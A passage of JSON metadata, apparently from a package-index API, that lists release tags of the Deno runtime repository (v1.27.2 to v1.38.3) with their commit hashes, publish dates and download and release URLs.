/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_